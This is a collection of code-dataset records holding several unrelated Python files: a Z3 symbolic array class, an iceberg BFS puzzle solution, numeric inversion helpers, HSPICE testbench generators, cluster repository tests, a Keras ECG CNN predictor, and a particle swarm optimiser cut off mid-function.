self._conc_store[index].z3obj\n )\n self._z3objConcCache = res\n return res\n\n def _try_build_reduced_array(self, index_min, index_max):\n if self._z3obj is not None:\n # symbolic mode\n return self._z3obj\n if index_max - index_min >= 2**self.index_width:\n return self.z3obj\n\n res = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for i in range(index_min, index_max + 1):\n if i in self._conc_store:\n res = z3.Store(\n res,\n z3.BitVecVal(i, self.index_width),\n self._conc_store[i].z3obj\n )\n return res\n\n def _switch_to_symbolic(self):\n if self._conc_store is not None:\n assert self._z3obj is None\n self._z3obj = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for index in self._conc_store:\n self._z3obj = z3.Store(\n self._z3obj,\n z3.BitVecVal(index, self.index_width),\n self._conc_store[index].z3obj\n )\n\n self._conc_store = None\n\n def Store(self, index, value):\n if isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n if isinstance(value, int):\n value = BVV(value, self.value_width)\n else:\n assert value.size == self.value_width\n\n # invalidate cache\n self._z3objConcCache = None\n\n if (\n isinstance(index, BVV) and\n self._conc_store is not None\n ):\n # concrete mode\n self._conc_store[index.value] = value\n else:\n # symbolic mode\n self._switch_to_symbolic()\n self._z3obj = z3.Store(\n self._z3obj,\n index.z3obj,\n value.z3obj\n )\n\n def ConditionalStore(self, index, value, cond):\n if isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n if isinstance(value, int):\n value = BVV(value, self.value_width)\n else:\n assert value.size == self.value_width\n if isinstance(cond, bool):\n cond = BoolV(cond)\n\n if isinstance(cond, BoolV):\n if cond.value:\n self.Store(index, value)\n return\n\n if (\n self._conc_store is not None and\n isinstance(index, BVV) and\n index.value in self._conc_store and\n self._conc_store[index.value].eq(value)\n ):\n # the condition is symbolic, but the value is already in memory\n # we can safely skip the store\n return\n\n self._switch_to_symbolic()\n self._z3obj = z3.If(\n cond.z3obj,\n z3.Store(\n self._z3obj,\n index.z3obj,\n value.z3obj\n ),\n self._z3obj\n )\n # this can be quite inefficient.\n # Let's try to simplify the expression.\n self._z3obj = z3.simplify(self._z3obj)\n\n def Select(self, index: BV) -> BV:\n if 
isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n\n if (\n isinstance(index, BVV) and\n self._conc_store is not None and\n index.value in self._conc_store\n ):\n # concrete mode\n return self._conc_store[index.value]\n\n # symbolic mode\n # no need to switch to symbolic mode! (is this right?)\n res = BVExpr(self.value_width,\n z3.Select(\n self._try_build_reduced_array(\n index.interval.low, index.interval.high),\n index.z3obj\n )\n )\n if (\n isinstance(index, BVV) and\n self._conc_store is not None\n ):\n # uninitialized read\n self._conc_store[index.value] = res\n return res\n\n def copy(self):\n new = BVArray(self.name, self.index_width, self.value_width)\n new._conc_store = deepcopy(self._conc_store)\n new._z3obj = self._z3obj\n\n return new\n\n def merge(self, other, merge_condition: Bool):\n assert self.name == other.name\n assert self.index_width == other.index_width\n assert self.value_width == other.value_width\n if isinstance(merge_condition, BoolV):\n if merge_condition.value:\n return other.copy()\n return self\n\n self._switch_to_symbolic()\n self._z3obj = z3.If(\n merge_condition.z3obj,\n other.z3obj,\n self._z3obj\n )\n # this can be quite inefficient.\n # Let's try to simplify the expression.\n self._z3obj = z3.simplify(self._z3obj)\n return self\n","sub_path":"expr/bitvector_array.py","file_name":"bitvector_array.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617472004","text":"import sys\nfrom collections import deque\nsys.stdin = open(\"./seung/input.txt\",\"r\")\nN,M = map(int,sys.stdin.readline().split())\n\nmatrix = [list(map(int,sys.stdin.readline().split())) for _ in range(N)]\n\n# Put all the iceberg cells in.\n\ndef melt_iceberg():\n queue = deque([])\n visited = [[0] * M for _ in range(N)]\n queue.append(iceberg[0])\n visited[iceberg[0][0]][iceberg[0][1]] = 1\n\n melting_area = {}\n melted_ice_cnt = 0\n dx = [-1, 0, 1, 0] # in order: left, up, right, down\n dy = [0, 1, 0, -1]\n while queue:\n melting_height = 0\n x,y = queue.popleft()\n melted_ice_cnt += 1\n for i in range(4):\n next_x = x + dx[i]\n next_y = y + dy[i]\n\n if 0 <= next_x < N and 0 <= next_y < M:\n if matrix[next_x][next_y] == 0:\n melting_height += 1\n elif not visited[next_x][next_y]:\n visited[next_x][next_y] = 1\n queue.append((next_x, next_y))\n melting_area[(x, y)] = melting_height\n\n # apply the melting only after the traversal so all cells melt simultaneously\n for (x, y), height in melting_area.items():\n matrix[x][y] = max(0, matrix[x][y] - height)\n\n new_iceberg = []\n for i in range(N):\n for j in range(M):\n if matrix[i][j] > 0:\n new_iceberg.append([i,j])\n return melted_ice_cnt, new_iceberg\n\nyear = 0\n\n# Set up the initial single-chunk iceberg\niceberg = []\nfor i in range(N):\n for j in range(M):\n if matrix[i][j]:\n iceberg.append((i, j))\n\nwhile True:\n cnt, new_ice = melt_iceberg()\n if cnt != len(iceberg): # has the initial iceberg split into pieces?\n break\n if cnt == 0 or len(new_ice) == 0:\n year = 0\n break\n\n iceberg = new_ice[:]\n year += 1\n\nprint(year)","sub_path":"seung/09_iceberg_re.py","file_name":"09_iceberg_re.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391298129","text":"############################################################################\n# Copyright 2017 Albin Severinson #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
#\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n############################################################################\n\n'''Numerical function inversion\n\n'''\n\nimport math\n\nfrom functools import lru_cache, partial\n\ndef _find_limits(fun=None, target=None):\n '''bound the input needed to reach value'''\n assert callable(fun)\n assert target is not None\n value = 1\n while fun(value) < target:\n value *= 2\n return math.floor(value / 2), value\n\n@lru_cache()\ndef _bounds_wrap(value, fun=None, lower=None, upper=None):\n '''wrap a function with bounds checking'''\n if value < lower:\n return -float('inf')\n if value > upper:\n return float('inf')\n return fun(value)\n\ndef numinv(fun=None, target=None, lower=None, upper=None):\n '''numerically invert a discrete function\n\n args:\n\n fun: function to invert. must be monotonically increasing in the range\n lower to upper. use lambdas to wrap your function if this is not the case.\n\n target: target value\n\n lower: lower bound to search, < float('inf') or None to find automatically.\n\n upper: upper bound to search, >= 0, or None to find automatically.\n\n returns: value such that fun(value) <= target < fun(value+1).\n\n '''\n assert callable(fun)\n assert target is not None\n assert 0 <= target < float('inf')\n if lower is None or upper is None:\n find_bounds = True\n else:\n find_bounds = False\n if lower is None:\n lower = 0\n if upper is None:\n upper = float('inf')\n\n # wrap fun with bounds checking\n ffun = partial(_bounds_wrap, fun=fun, lower=lower, upper=upper)\n\n # find upper and lower bounds\n if find_bounds:\n lower, upper = _find_limits(ffun, target)\n\n # binary search\n while upper - lower > 1:\n middle = math.floor(lower + (upper - lower) / 2)\n if ffun(middle) >= target:\n upper = middle\n else:\n lower = middle\n\n # return whichever is closest and lower if it is a tie\n if abs(ffun(lower) - target) <= abs(ffun(upper) - target):\n return lower\n else:\n return upper\n\ndef cnuminv(fun=None, target=None, lower=None, upper=None, ytol=None, xtol=None, tol=1e-7):\n '''numerically invert a continuous function\n\n args:\n\n fun: function to invert. must be monotonically increasing in the range\n lower to upper. 
use lambdas to wrap your function if this is not the case.\n\n target: target value\n\n lower: lower bound to search, < math.inf or None to find automatically.\n\n upper: upper bound to search, >= 0, or None to find automatically.\n\n xtol: function input tolerance.\n\n ytol: function output tolerance.\n\n tol: sets both xtol and ytol\n\n returns: value such that value-tol < target and value+tol > target.\n\n '''\n assert callable(fun)\n assert target is not None\n assert 0 <= target < math.inf\n if xtol is not None or ytol is not None:\n assert tol is None, 'tol and xtol/ytol cannot be used at the same time'\n if tol is not None:\n assert xtol is None and ytol is None, 'tol and xtol/ytol cannot be used at the same time'\n if ytol is None:\n ytol = tol\n if xtol is None:\n xtol = tol\n assert 0 < xtol < math.inf\n assert 0 < ytol < math.inf\n if lower is None or upper is None:\n find_bounds = True\n else:\n find_bounds = False\n if lower is None:\n lower = 0\n if upper is None:\n upper = math.inf\n\n # wrap fun with bounds checking\n ffun = partial(_bounds_wrap, fun=fun, lower=lower, upper=upper)\n\n # find upper and lower bounds\n if find_bounds:\n lower, upper = _find_limits(ffun, target)\n\n # binary search\n x = lower + (upper - lower) / 2\n while True:\n y = ffun(x)\n if abs(y-target) <= ytol and (upper - lower) <= xtol:\n break\n if y >= target:\n upper = x\n else:\n lower = x\n x = lower + (upper - lower) / 2\n\n return x\n","sub_path":"pynumeric/pynumeric.py","file_name":"pynumeric.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"509315836","text":"#==== tbrf generation =======\n\nimport HSPICE_mds\n#==============================================================\n# v3 receives only nominal frequency, but receive vdd,temp, use [0]\n# it receives design parameters as dm\n# only generates tbrf for the ones are in \"result_exist\"\n#==============================================================\ndef gen_tbrf_v3(PDK,format_dir,tbrf_dir,dm,freq,result_exist,vdd,temp):\n\tr_file=open(format_dir+\"/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\tfor nd in result_exist:\n\t\tN_fc=dm[nd][3]\t \n\t\tN_cc=dm[nd][1]\t\n\t\tN_drv=dm[nd][0]\n\t\tN_stg=dm[nd][2]\n\t\tN_ctrl_fc=N_stg*N_fc\n\t\tN_ctrl_cc=N_stg*N_cc\n\t\tper_tmp=1/freq[nd][0][0] #nominal freq, nominal temp\n\t\tfreq_tmp=freq[nd][0][0]\n\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\tnetmap1.get_net('ff',None,freq_tmp,freq_tmp,1)\n\t\tnetmap1.get_net('ht',None,50*per_tmp,50*per_tmp,1)\n\t\tnetmap1.get_net('nd',None,N_drv,N_drv,1)\n\t\tnetmap1.get_net('nm',None,N_cc,N_cc,1)\n\t\tnetmap1.get_net('nt','sc',N_stg,N_stg,1)\n\t\tnetmap1.get_net('nf',None,N_fc,N_fc,1)\n\t\t#----- only string -----------\n\t\tnetmap1.get_net('PK',PDK,None,None,None)\n\t\t#----- lateral stuffs --------\n\t\tnetmap1.get_net('vf','vf',0,N_ctrl_fc-1,1)\n\t\tnetmap1.get_net('vc','vc',0,N_ctrl_cc-1,1)\n\t\tnetmap1.get_net('vd',None,vdd[0],vdd[0],1)\n\t\tnetmap1.get_net('tm',None,temp[0],temp[0],1)\n\t\tnetmap1.get_net('f1',None,'d2o',N_ctrl_fc,N_ctrl_fc//2)\n\t\tnetmap1.get_net('c1',None,'d2o',N_ctrl_cc,N_ctrl_cc//2)\n\t\twith open(tbrf_dir+\"/tbrf_%dring%d_osc%d_fc%d.sp\"%(N_drv,N_cc,N_stg,N_fc),\"w\") as w_file:\n\t\t\tfor line in lines:\n\t\t\t netmap1.printline(line,w_file)\n\t\t\tprint(\"tbrf nstg=%d\"%(N_stg))\n\n\n#==============================================================\n# v2 receives only nominal frequency\n# it receives design parameters 
as lists\n# only generates tbrf for the ones are in \"result_exist\"\n#==============================================================\ndef gen_tbrf_v2(ncell,ndrv,nfc,nstg,freq,result_exist):\n\tr_file=open(\"./formats/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\tprint (\"result_exist\"),\n\tprint (result_exist)\n\tfor nd in result_exist:\n\t\ti=nd+1 #ncell[0]='ncell'\n\t\tNCC=ncell[i]\n\t\tNDRV=ndrv[i]\n\t\tNFC=nfc[i]\n\t\tNSTG=nstg[i]\n\t\tN_ctrl_fc=NSTG*NFC\n\t\tN_ctrl_cc=NSTG*NCC\n\t\t#print freq[nd]\n\t\tper_tmp=1/freq[nd][0][0] #nominal freq, nominal temp\n\t\tfreq_tmp=freq[nd][0][0]\n\t\t#print per_tmp \n\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\tnetmap1.get_net('ff',None,freq_tmp,freq_tmp,1)\n\t\tnetmap1.get_net('ht',None,50*per_tmp,50*per_tmp,1)\n\t\tnetmap1.get_net('nd',None,NDRV,NDRV,1)\n\t\tnetmap1.get_net('nm',None,NCC,NCC,1)\n\t\tnetmap1.get_net('nt','sc',NSTG,NSTG,1)\n\t\tnetmap1.get_net('nf',None,NFC,NFC,1)\n\t\t#----- lateral stuffs --------\n\t\tnetmap1.get_net('vf','vf',0,N_ctrl_fc-1,1)\n\t\tnetmap1.get_net('vc','vc',0,N_ctrl_cc-1,1)\n\t\tnetmap1.get_net('f1',None,'d2o',N_ctrl_fc,N_ctrl_fc//2)\n\t\tnetmap1.get_net('c1',None,'d2o',N_ctrl_cc,N_ctrl_cc//2)\n\t\twith open(\"./HSPICE/TBrf_v2/tbrf_%dring%d_osc%d_fc%d.sp\"%(NDRV,NCC,NSTG,NFC),\"w\") as w_file:\n\t\t\tfor line in lines:\n\t\t\t netmap1.printline(line,w_file)\n\t\t\tprint(\"tbrf nstg=%d\"%(NSTG))\n\t\t\n\n\ndef gen_tbrf(ncell,ndrv,nfc,nstg_start,nstg_end,nstg_step,freq_cc,fcidx):\n\n\tvm1=HSPICE_mds.varmap() ###modify here!!\n\tvm1.get_var('ncell',ncell,ncell,1)\n\tvm1.get_var('nstage',nstg_start,nstg_end,nstg_step)\n\tvm1.get_var('ndrive',ndrv,ndrv,1)\n\tvm1.get_var('nfc',nfc,nfc,1)\n\tvm1.cal_nbigcy()\n\tvm1.combinate()\n\tnum_var=1\n\n\tr_file=open(\"./formats/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\t\n\t\n\tfor i in range(1,len(vm1.comblist[0])):\n\t\tfor cc, freq in freq_cc[i-1].iteritems():\n\t\t\tper=1/freq\n\t\t\t#print per \n\t\t\t#w_file=open(\"./HSPICE/TBrf/tbrf_%dring%d_osc%d_cc%d_nf%d.sp\"%(vm1.comblist[2][i],vm1.comblist[0][i],vm1.comblist[1][i],cc,nfc),\"w\")\n\t\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\t\tnetmap1.get_net('ff',None,freq,freq,1)\n\t\t\tnetmap1.get_net('ht',None,50*per,50*per,1)\n\t\t\tnetmap1.get_net('nd',None,vm1.comblist[2][i],vm1.comblist[2][i],1)\n\t\t\tnetmap1.get_net('nm',None,vm1.comblist[0][i],vm1.comblist[0][i],1)\n\t\t\tnetmap1.get_net('nt','sc',vm1.comblist[1][i],vm1.comblist[1][i],1)\n\t\t\tnetmap1.get_net('nf',None,vm1.comblist[3][i],vm1.comblist[3][i],1)\n\t\t\t#netmap1.get_net('nf',None,nfc,nfc,1)\n\t\t\t#----- lateral stuffs --------\n\t\t\tnetmap1.get_net('vf','vf',0,nfc-1,1)\n\t\t\tnetmap1.get_net('vc','vc',0,ncell-1,1)\n\t\t\tnetmap1.get_net('f1',None,'d2o',nfc,fcidx)\n\t\t\tnetmap1.get_net('c1',None,'d2o',ncell,cc)\n\t\t\twith open(\"./HSPICE/TBrf/tbrf_%dring%d_osc%d_cc%d.sp\"%(vm1.comblist[2][i],vm1.comblist[0][i],vm1.comblist[1][i],cc),\"w\") as w_file:\n\t\t\t\tfor line in lines:\n\t\t\t\t netmap1.printline(line,w_file)\n\t\t\t\tprint(\"tbrf nstg=%d\"%(i+nstg_start-1))\n","sub_path":"generators/pll-gen/pymodules/HSPICE_tbrf.py","file_name":"HSPICE_tbrf.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399916737","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: 
build/bdist.linux-x86_64/egg/tests/test_repository.py\n# Compiled at: 2014-10-22 16:00:16\n__docformat__ = 'reStructuredText'\n__author__ = 'Antonio Messina '\nimport os, shutil, tempfile, unittest, nose.tools as nt\nfrom elasticluster.repository import ClusterRepository, MemRepository\n\nclass FakeCluster(object):\n \"\"\"Fake class used for the storage cluster class. The only thing the\n ClusterRepository class assumes is that the saved class has a `name`\n attribute.\n \"\"\"\n\n def __init__(self, name='fake_cluster'):\n self.name = name\n self.nodes = {}\n\n def __eq__(self, other):\n return self.name == other.name\n\n\nclass MemRepositoryTests(unittest.TestCase):\n\n def setUp(self):\n self.storage = MemRepository()\n\n def test_get_all(self):\n clusters = [ FakeCluster('test_%d' % i) for i in range(10) ]\n for cluster in clusters:\n self.storage.save_or_update(cluster)\n\n new_clusters = self.storage.get_all()\n for cluster in new_clusters:\n nt.assert_true(cluster in clusters)\n\n def test_get(self):\n clusters = [ FakeCluster('test_%d' % i) for i in range(10) ]\n for cluster in clusters:\n self.storage.save_or_update(cluster)\n\n new_clusters = [ self.storage.get(cluster.name) for cluster in clusters ]\n for cluster in new_clusters:\n nt.assert_true(cluster in clusters)\n\n def test_delete(self):\n cluster = FakeCluster('test1')\n self.storage.save_or_update(cluster)\n nt.assert_true(cluster.name in self.storage.clusters)\n self.storage.delete(cluster)\n nt.assert_false(cluster.name in self.storage.clusters)\n\n\nclass ClusterRepositoryTests(MemRepositoryTests):\n\n def setUp(self):\n self.path = tempfile.mkdtemp()\n self.storage = ClusterRepository(self.path)\n\n def tearDown(self):\n shutil.rmtree(self.path, ignore_errors=True)\n del self.storage\n\n def test_delete(self):\n pass\n\n def test_save_and_delete(self):\n cluster = FakeCluster('test1')\n self.storage.save_or_update(cluster)\n clusterpath = os.path.join(self.path, 'test1.pickle')\n nt.assert_true(os.path.exists(clusterpath))\n self.storage.delete(cluster)\n nt.assert_false(os.path.exists(clusterpath))\n\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()","sub_path":"pycfiles/elasticluster-1.2-py2.7/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"226237807","text":"#Task:\n#Read n strings into array Y and array X\n#Create array Z and concatenate the strings of the two arrays into it\n\n\nn = int(input(\"Enter the array size: \"))\nwhile n<1:\n n = int(input(\"Enter the array size: \"))\n\nnizx = [0]*n\nnizy = [0]*n\nnizz = [0]*n\nfor i in range(n):\n num = input(\"Enter a word for the X array: \")\n nizx[i] = num\n\nprint(\"\")\nfor i in range(n):\n word = input(\"Enter a word for the Y array: \")\n nizy[i] = word\n\nfor i in range(n):\n nizz[i] = nizx[i]+nizy[i]\n\nprint(nizz)\n \n \n","sub_path":"Programiranje/Stringovi/GoranCaljkusic_0.py","file_name":"GoranCaljkusic_0.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"446362717","text":"\"\"\"\n'Kaotic Hegemony' copyright 2012\n\nBased off one of my favorite games from the early 90s.\nCode is licensed by GPL and can be used freely.\nCredit is appreciated but not mandatory.\n\nPlease do not use any of the artwork in other projects.\nNo warranty expressed or implied.\n\n-Written by Sean J. 
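# A hypothetical in-memory analogue of the repository interface the
# elasticluster tests above exercise (save_or_update / get / get_all / delete,
# keyed by a cluster's `name`); illustrative only, not the real MemRepository:
class TinyMemRepository(object):

    def __init__(self):
        self.clusters = {}

    def save_or_update(self, cluster):
        self.clusters[cluster.name] = cluster

    def get(self, name):
        return self.clusters[name]

    def get_all(self):
        return list(self.clusters.values())

    def delete(self, cluster):
        self.clusters.pop(cluster.name, None)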
McKiernan 'Mekire'\n\"\"\"\n\nif __name__ == '__main__':\n import data.main\n Runner = data.main.Control()\n Runner.main()\n","sub_path":"Tutoriales-Ejemplos/Ejemplos/ChaoticHegemony-0.06/chaotic_hegemony.py","file_name":"chaotic_hegemony.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341466350","text":"import numpy as np\nfrom keras.models import load_model\n# keras imports\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, Conv1D, Dropout, Flatten, Dense, MaxPooling1D, Activation, GlobalAveragePooling1D, BatchNormalization\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.callbacks import Callback,warnings\nimport keras.utils as np_utils\n\nimport tensorflow as tf \n\ndef cnn_net(window_size):\n\t# parameters\n\tinput_feat = 1\n\toutput_feat = 4\n\n\tconvfilt = 128 \t\t# number of neurons\n\tconvstr = 1 \t\t# no idea what it does \n\tksize = 5\t\t\t# kernel width\t\n\tdropout = 0.20\t\t# dropout probability\n\n\tpoolsize = 2\n\tpoolstr = 2\n\n\t# input layer\n\tinput1 = Input(shape=(window_size, input_feat), name='input1')\n\n\t# first convolution layer conv(relu)->maxpooling->dropout\n\tx = Conv1D(filters=convfilt,\n\t\t\t\t kernel_size=ksize,\n\t\t\t\t padding='same',\n\t\t\t\t strides=convstr,\n\t\t\t\t kernel_initializer='he_normal')(input1)\n\tx = BatchNormalization()(x)\n\tx = Activation('relu')(x)\n\tx = MaxPooling1D(pool_size=poolsize,\n\t\t\t\t\t\tstrides=poolstr)(x)\n\t#x = Dropout(dropout)(x)\n\n\t# other 6 convolution layers conv(relu)->maxpooling->dropout\n\tfor i in range(6):\n\t\tx = Conv1D(filters=convfilt,\n\t\t\t\t\t kernel_size=ksize,\n\t\t\t\t\t padding='same',\n\t\t\t\t\t strides=convstr,\n\t\t\t\t\t kernel_initializer='he_normal')(x)\n\t\tx = BatchNormalization()(x)\n\t\tx = Activation('relu')(x)\n\t\tx = MaxPooling1D(pool_size=poolsize,\n\t\t\t\t\t\t\tstrides=poolstr)(x)\n\t\t#x = Dropout(dropout)(x)\n\n\tx = GlobalAveragePooling1D()(x)\n\n\t# not sure about this step\n\t#x = Flatten()(x)\n\n\t# dense layers\n\tx = Dense(256, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\tx = Dense(128, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\tx = Dense(64, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\n\t# output\n\tout = Dense(output_feat, activation='softmax')(x)\n\tmodel = Model(inputs=input1, outputs=out)\n\n\tmodel.compile(optimizer='adam',\n\t\t\t\t loss='categorical_crossentropy',\n\t\t\t\t metrics=['accuracy'])\n\treturn model\n\n# Load data\nX_test = np.load('./data/Xt_bw.npy')\n\n# Parameters\nFS = 300\nmaxlen = 30*FS\n\n'''\n# Preprocessing data\nn_samples, n_features = X_test.shape\ndata = np.zeros((n_samples, n_features))\nfor i in range(n_samples):\n x = X_test[i,:]\n x = x - np.mean(x)\n x = x / np.std(x)\n data[i,:] = x\ndata = np.expand_dims(data, axis=2)\n'''\nmodel = load_model('128_conv_7_dense_3.h5')\n\n#model1 = cnn_net(maxlen)\n#model1.load_weights('weights.h5')\n\ndata = np.expand_dims(X_test, axis=2)\n\nprint(\"Applying model ..\") \nprob = model.predict(data)\nnp.savetxt('./data/y_test_conv.csv', prob, fmt='%0.2f')\n","sub_path":"project3_test/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632006283","text":"#===============================================================================\n# @author: Yu 
Bao rewrited\n# @organization: CUMT, School of Computer Science, 2017\n#\n#\n# This package contains representations of the following models:\n# 'Particle' - an atomic element\n# 'Swarm' - a set of particles\n# 'Neighbourhood' - particles topology\n# 'KnapsackSolution' - representation for solution of the problem\n# 'TSPSolution' - representation for solution of the problem\n#===============================================================================\n\n\n\n#===============================================================================\n# GENERIC MODELS\n#===============================================================================\nfrom ObjectiveFunction import OBJFUN\nimport numpy as np\nimport scipy.spatial as spp\nimport matplotlib.pyplot as plt\n\n#---- Particle representation\nclass ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = None\n _bestfitness = None\n _objfun = None\n _typerange = None\n _nbbestfitness = None\n _bestfitness = None\n\n def __init__(self,objectfun):\n self._position = None #最佳组合\n self._velocity = None #变换速度\n self._bestPosition = None #历史最佳\n self._nbBestPosition = None #全局最佳\n self._fitness = None #适应度\n self._bestfitness =None #历史最佳的适应度\n self._nbbestfitness = None #global最佳的适应度\n self._objfun=OBJFUN(objectfun) #目标函数\n self.dim=None\n\n\n def initparas(self,w,c1,c2,r1,r2):\n self.w=w\n self.c1=c1\n self.c2=c2\n self.r1=r1\n self.r2=r2\n\n def initParticle(self, dimensions,truckset):\n self.dim=dimensions\n self._typerange=len(truckset)\n self._objfun.setParas(truckset,len(truckset))\n # Create position array\n self._position = np.random.randint(0,self._typerange, size = dimensions)\n\n if self._position.max()>self._typerange: #生成数字是否错误?\n print(\"bigger than 2\")\n quit()\n # Create Velocity array\n self._velocity = np.random.randint(0,self._typerange, size = dimensions)\n # Save best Position so far as current Position\n self._bestPosition = self._position\n self.updateFitness()\n\n def updateFitness(self):\n # Get Differences of vector ??????\n #hdist = spp.distance.hamming(self._position, self._solution) #计算海明距离\n hdist=self._objfun.getobjectfunvalue(self._position)\n #print(hdist)\n self._fitness=hdist\n # Save it as best position if its better than previous best\n if self._bestfitness is None:\n self._bestfitness=hdist\n if hdist < self._bestfitness:\n self._bestPosition = np.copy(self._position)\n self._bestfitness = hdist\n\n\n def updatePosition(self):\n # VELOCITY NEEDS TO BE CONSTRICTED WITH VMAX\n # Get random coefficients e1 & e2\n # c = 2.5\n self.r1 = np.random.rand()\n self.r2 = np.random.rand()\n vmax = 6\n # Apply equation to each component of the velocity, add it to corresponding position component\n for i, velocity in enumerate(self._velocity):\n # velocity = 0.72984 * (velocity + c * e1 * (model._bestPosition[i] - model._position[i]) + c * e2 * (model._nbBestPosition[i] - model._position[i]))\n #velocity = self.w*velocity + self.c1 * self.r1 * (self._bestPosition[i] - self._position[i]) + \\\n # self.c2 * self.r2 * (self._nbBestPosition[i] - self._position[i])\n velocity = self.w*velocity + self.c1 * self.r1 * (self._bestPosition[i] - self._position[i]) + \\\n self.c2 * self.r2 * (self._bestPosition[i] - self._position[i])\n\n if abs(velocity) > vmax and abs(velocity) is velocity:\n velocity = vmax\n elif abs(velocity) > vmax:\n velocity = -vmax\n velocity = self.sigmoid(velocity)\n # print \"vel:\", velocity\n for j in range(0,self._typerange):\n if 
self._nbbestfitness-self._bestfitness>(self._bestfitness/self.dim):\n if np.random.rand(1) < (j + 1) * velocity / self._typerange: # 离散量\n self._position[i] = (j+1)%self._typerange\n else:\n if np.random.rand(1)<(j+1)*velocity/self._typerange: #离散量\n self._position[i] = j\n\n # if np.random.rand(1) < velocity-1: #这是给二进制用的\n # self._position[i] = 1\n # else:\n # self._position[i] = 0\n if self._position.max() > self._typerange: # 生成数字是否错误?\n print(\"bigger than 2,22222\")\n quit()\n\n def setgbest(self,gbestpositiion, gbestfit):\n self._nbBestPosition=np.copy(gbestpositiion)\n self._nbbestfitness=gbestfit\n\n def sigmoid(self, x):\n return 1.0 / (1.0 + np.exp(-(x)))\n\n# ---- Swarm representation\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = None\n\n def __init__(self,objectfun):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = None\n self._objectfun=objectfun\n\n def initpaticleparas(self,w,c1,c2,r1,r2):\n self.w=w\n self.c1=c1\n self.c2=c2\n self.r1=r1\n self.r2=r2\n\n def initSwarm(self, truckset, nParticles = 1, dimensions = 1):\n # Create Swarm\n for i in range(nParticles):\n newParticle = ParticleModel(self._objectfun)\n newParticle.initParticle(dimensions,truckset)\n newParticle.initparas(self.w,self.c1,self.c2,self.r1,self.r2)\n self._particles.append(newParticle)\n\n #self._neighbourhoods = self._neighbourhoodController.initNeighbourhoods(self)\n self.updateSwarmBestPosition()\n\n def updateSwarmBestPosition(self):\n # Find swarm best position and save it in swarm\n for nb in self._particles: #self._neighbourhoods:\n #self._neighbourhoods.updateNeighbourhoodBestPosition(nb)\n if self._bestPositionFitness is None or nb._bestfitness < self._bestPositionFitness:\n self._bestPositionFitness = nb._bestfitness\n self._bestPosition = np.copy(nb._bestPosition)\n for curParticle in self._particles:\n curParticle.setgbest(self._bestPosition,self._bestPositionFitness)\n\n # Update all particles in the swarm\n def updateSwarm(self):\n for curParticle in self._particles:\n print(curParticle._position)\n curParticle.updatePosition()\n print(curParticle._position)\n print(curParticle._fitness)\n curParticle.updateFitness()\n\n self.updateSwarmBestPosition()\n return self._bestPositionFitness\n\n def drawpic(self):\n plt.figure(1)\n plt.title(\"Figure1\")\n plt.grid(True)\n\n plt.ion()\n try:\n i=0\n for curParticle in self._particles:\n plt.scatter(i,curParticle._bestfitness)\n i+=1\n plt.pause(0.01)\n #plt.clf()\n except Exception as err:\n print(err)\n\n\n# ---- Neighbourhood representation,用来找全局,在图上\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = None\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = None\n\n def initNeighbourhoods(self, swarm, topology=\"gbest\"):\n if topology is \"gbest\":\n return [NeighbourhoodModel(swarm._particles)]\n elif topology is \"lbest\":\n neighbourhoods = []\n for idx, curParticle in enumerate(swarm._particles):\n previousParticle = None\n 